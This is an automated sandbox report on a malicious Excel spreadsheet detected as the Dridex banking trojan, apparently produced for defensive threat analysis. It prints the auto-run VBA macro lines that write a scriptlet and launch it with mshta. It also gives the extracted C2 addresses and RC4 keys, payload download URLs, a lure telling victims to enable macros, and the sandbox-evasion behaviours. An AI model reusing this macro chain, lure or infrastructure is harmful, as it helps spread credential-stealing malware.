Windows Analysis Report 4TWEQh2HJb

Overview

General Information

Sample Name: 4TWEQh2HJb (renamed file extension from none to xls)
Analysis ID: 448885
MD5: 40425d09e54ff26289dd074649f0cad9
SHA1: ae7e4df26092d9acf01b732c8144f0170ccc6556
SHA256: 6f8f1b26324ea0f3f566fbdcb4a61eb92d054ccf0300c52b3549c774056b8f02
Tags: excelxlsx

Detection

Dridex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office creates scripting files
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Tries to detect virtualization through RDTSC time measurements
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack Malware Configuration Extractor: Dridex {"Version": 22202, "C2 list": ["202.29.60.34:443", "66.175.217.172:13786", "78.46.78.42:9043"], "RC4 keys": ["RQTJGOuDHeSyUCWzdNRZi3fWMitWY9aTc", "2UMW8pusQXiNJDgmuPITkf4TmrOt3Y13lRDWnjBuu16JkzjIG6gNuckQDkiut9pzQHVGfFdlT"]}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\qDialogMainChartType.exe ReversingLabs: Detection: 30%
Multi AV Scanner detection for submitted file
Source: 4TWEQh2HJb.xls Virustotal: Detection: 27%
Machine Learning detection for dropped file
Source: C:\ProgramData\qDialogMainChartType.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 4TWEQh2HJb.xls Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.qDialogMainChartType.exe.10000000.3.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\ProgramData\qDialogMainChartType.exe Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: qDialogMainChartType.exe, 00000003.00000003.2117450423.000000007DE80000.00000004.00000001.sdmp
Source: Binary string: wshom.pdb source: mshta.exe, 00000002.00000002.2363567124.0000000002730000.00000002.00000001.sdmp
Source: Binary string: Gpernfedeefe.pdb source: mshta.exe, 00000002.00000003.2105631020.0000000004D5B000.00000004.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000000.2105589757.0000000010015000.00000002.00020000.sdmp, qDialogMainChartType.exe.2.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onlinefastsolutions.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 202.29.60.34:443
Source: Malware configuration extractor IPs: 66.175.217.172:13786
Source: Malware configuration extractor IPs: 78.46.78.42:9043
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown Network traffic detected: HTTP traffic on port 8088 -> 49165
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 208.83.69.35:8088
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.15.12Date: Wed, 14 Jul 2021 18:00:06 GMTContent-Type: application/octet-streamContent-Length: 167936Connection: keep-aliveLast-Modified: Wed, 14 Jul 2021 13:48:51 GMTETag: "60eeeb43-29000"Accept-Ranges: bytes
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 78.46.78.42
Source: Joe Sandbox View IP Address: 202.29.60.34
Source: Joe Sandbox View IP Address: 66.175.217.172
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
Source: Joe Sandbox View ASN Name: CMRU-AS-APChiangmaiRajabhatUniversityTH
Source: global traffic HTTP traffic detected: GET /tpls/file3.bin HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: qWK3FM3Host: onlinefastsolutions.com:8088
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: onlinefastsolutions.com
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://buyer-remindment.com:8088/css/file7.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://buyer-remindment.com:8088/fonts/file8.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp String found in binary or memory: http://buyer-remindment.com:8088/tpls/file4.bin:
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://fasteasyupdates.com:8088/vendors/file4.bin
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.comQ
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://insiderushings.com:8088/js/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp String found in binary or memory: http://insiderushings.com:8088/js/file13.binj
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/images/details.binG
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/images/file13.bin
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/js/file1.binT
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2369723384.0000000004D00000.00000004.00000001.sdmp, mshta.exe, 00000002.00000002.2362918799.00000000001BF000.00000004.00000020.sdmp, mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bin
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binQ
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binX
Source: mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.binc
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp String found in binary or memory: http://onlinefastsolutions.com:8088/tpls/file3.bind
Source: mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin
Source: mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp String found in binary or memory: http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.bethmardutho.org.P
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.c-and-g.co.jp
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com;Copyright
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Dridex unpacked file
Source: Yara match File source: 3.2.qDialogMainChartType.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing at the notification yellow bat i 18 11 1 19 2.And click Enable Content in next noti
Source: Screenshot number: 4 Screenshot OCR: Enable Content in next notification. 'S :: : 3.OR Use DecryptTooi from https://shop.globalsign.com
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing at the notification yellow bar. 2.And click Enable Content in next notification. 3.
Source: Document image extraction number: 2 Screenshot OCR: Enable Content in next notification. 3.OR Use DecryptTooi from https://shop.globalsign.com/en/docu
Document contains an embedded VBA macro which may execute processes
Source: 4TWEQh2HJb.xls OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Document contains an embedded VBA macro with suspicious strings
Source: 4TWEQh2HJb.xls OLE, VBA macro line: Set qLine = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct")
Source: 4TWEQh2HJb.xls OLE, VBA macro line: With CreateObject("Wscript.Shell")
Source: 4TWEQh2HJb.xls OLE, VBA macro line: .Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34))
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String createtextfile: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct") Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: Set qLine = . CreateTextFile(Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct") Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String wscript: With CreateObject("Wscript.Shell") Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String environ: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34)) Name: WorkBook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open, String mshta: . Exec ("mshta " & Chr(34) & Environ("ALLUSERSPROFILE") & "\qRangeAutoFormatLocalFormat3.sct" & Chr(34)) Name: WorkBook_Open
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ProgramData\qRangeAutoFormatLocalFormat3.sct
Abnormal high CPU Usage
Source: C:\ProgramData\qDialogMainChartType.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\ProgramData\qDialogMainChartType.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\ProgramData\qDialogMainChartType.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10012840 NtAllocateVirtualMemory, 3_2_10012840
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1001223C NtDelayExecution, 3_2_1001223C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1001326C NtProtectVirtualMemory, 3_2_1001326C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000BB88 NtClose, 3_2_1000BB88
Detected potential crypto function
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10010754 3_2_10010754
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10011460 3_2_10011460
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000846C 3_2_1000846C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10001494 3_2_10001494
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000A52C 3_2_1000A52C
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10011D58 3_2_10011D58
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10019348 3_2_10019348
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 4TWEQh2HJb.xls OLE, VBA macro line: Sub WorkBook_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function WorkBook_Open Name: WorkBook_Open
Document contains embedded VBA macros
Source: 4TWEQh2HJb.xls OLE indicator, VBA macros: true
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: qDialogMainChartType.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@5/2@2/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREA9C.tmp
Source: 4TWEQh2HJb.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 4TWEQh2HJb.xls Virustotal: Detection: 27%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe mshta 'C:\ProgramData\qRangeAutoFormatLocalFormat3.sct'
Source: C:\Windows\System32\mshta.exe Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\ProgramData\qDialogMainChartType.exe Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\ProgramData\qDialogMainChartType.exe Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_1000F6CC push esi; mov dword ptr [esp], 00000000h 3_2_1000F6CD
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_00240142 push eax; iretd 3_2_00240143
Source: initial sample Static PE information: section name: .text entropy: 7.82504513314

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\qDialogMainChartType.exe
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\qDialogMainChartType.exe

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown Network traffic detected: HTTP traffic on port 8088 -> 49165
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\ProgramData\qDialogMainChartType.exe Section loaded: OutputDebugStringW count: 505
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Source: C:\ProgramData\qDialogMainChartType.exe Section loaded: \KnownDlls32\Self.exE
Source: C:\ProgramData\qDialogMainChartType.exe Section loaded: \KnownDlls32\testapp.exe
Tries to detect virtualization through RDTSC time measurements
Source: C:\ProgramData\qDialogMainChartType.exe RDTSC instruction interceptor: First address: 0000000010001332 second address: 0000000010001336 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc
Source: C:\ProgramData\qDialogMainChartType.exe RDTSC instruction interceptor: First address: 0000000010001336 second address: 0000000010001332 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 xor eax, eax 0x00000006 xor edx, edx 0x00000008 sub edi, esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e cmp eax, edi 0x00000010 cmovb eax, edi 0x00000013 cmp ecx, edi 0x00000015 cmovnbe ecx, edi 0x00000018 mov bl, byte ptr [esp+2Bh] 0x0000001c mov byte ptr [esp+3Bh], bl 0x00000020 mov edx, dword ptr [esp+08h] 0x00000024 add edx, 01h 0x00000027 mov esi, dword ptr [esp+2Ch] 0x0000002b cmp edx, esi 0x0000002d mov edi, ecx 0x0000002f mov esi, eax 0x00000031 mov dword ptr [esp+24h], edi 0x00000035 mov dword ptr [esp+18h], eax 0x00000039 mov dword ptr [esp+1Ch], ecx 0x0000003d mov dword ptr [esp+20h], esi 0x00000041 mov dword ptr [esp+14h], edx 0x00000045 je 00007FF638C6BCE3h 0x0000004b jmp 00007FF638C6BD3Dh 0x0000004d mov eax, dword ptr [esp+14h] 0x00000051 mov ecx, dword ptr [esp+1Ch] 0x00000055 mov edx, dword ptr [esp+18h] 0x00000059 mov dword ptr [esp+08h], eax 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 rdtsc
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\ProgramData\qDialogMainChartType.exe Window / User API: threadDelayed 505
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 3048 Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\qDialogMainChartType.exe TID: 2220 Thread sleep count: 505 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\ProgramData\qDialogMainChartType.exe Last function: Thread delayed
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10010754 GetSystemInfo, 3_2_10010754

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10019B00 LdrInitializeThunk, 3_2_10019B00
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 3_2_10006D50

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 3_2_10006D50
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 3_2_10006D50
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid